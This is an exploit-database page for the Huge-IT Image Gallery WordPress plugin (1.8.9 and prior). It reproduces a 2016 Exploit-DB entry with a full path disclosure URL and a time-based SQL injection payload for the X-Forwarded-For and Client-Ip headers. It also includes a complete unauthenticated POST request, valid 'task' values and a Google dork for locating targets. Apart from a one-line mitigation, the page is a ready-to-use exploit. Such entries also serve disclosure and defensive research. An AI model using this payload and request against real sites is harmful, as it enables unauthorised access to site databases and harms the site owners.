header-logo
Suggest Exploit
vendor:
Image Gallery
by:
Gwendal Le Coguic
7,5
CVSS
HIGH
Full Path Disclosure and SQL Injection
89, 89, 89, 89, 89
CWE
Product Name: Image Gallery
Affected Version From: 1.8.9
Affected Version To: Prior
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:wordpress:1.8.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

WordPress plugin Image Gallery Full Path Disclosure and SQL Injection

Huge-IT Image Gallery is the best plugin to use if you want to be original with your website. Full Path Disclosure can be exploited by sending a request to http://[target]/wp-content/plugins/gallery-images/gallery-images.php. SQL Injection can be exploited by sending a payload of '123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL' in the headers X-Forwarded-For and Client-Ip. The 'galleryid' must be configured or try another id and the 'task' parameter can be: load_images_content, load_images_lightbox, load_image_justified, load_image_thumbnail, load_blog_view. Client-Ip overwrites X-Forwarded-For and some systems drop those headers.

Mitigation:

Sanitize the variable $huge_it_ip.
Source

Exploit-DB raw data:

# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection
# Google Dork: inurl:"wp-content/plugins/gallery-images/"
# Date: 12-05-2016
# Software Link: https://fr.wordpress.org/plugins/gallery-images/
# Version: 1.8.9 and prior
# Exploit Author: Gwendal Le Coguic
# Website: http://10degres.net
# Category: webapps


##### About #####

Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.


##### Full Path Disclosure #####

http://[target]/wp-content/plugins/gallery-images/gallery-images.php


##### SQL Injection #####

Headers X-Forwarded-For and Client-Ip are vulnerable.
Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization
Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Client-Ip: 123.123.123.123
X-Forwarded-For: 123.123.123.123
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100


### Extras infos #####

The "galleryid" must be configured or try another id.

You don't need to be authed to exploit the injection but the plugin must be enable.

"task" parameter can be:
  load_images_content
  load_images_lightbox
  load_image_justified
  load_image_thumbnail
  load_blog_view

Client-Ip overwrite X-Forwarded-For.
Some system drop those headers.


##### References #####

https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection

Navigation

Suggest Exploit

Services By CQR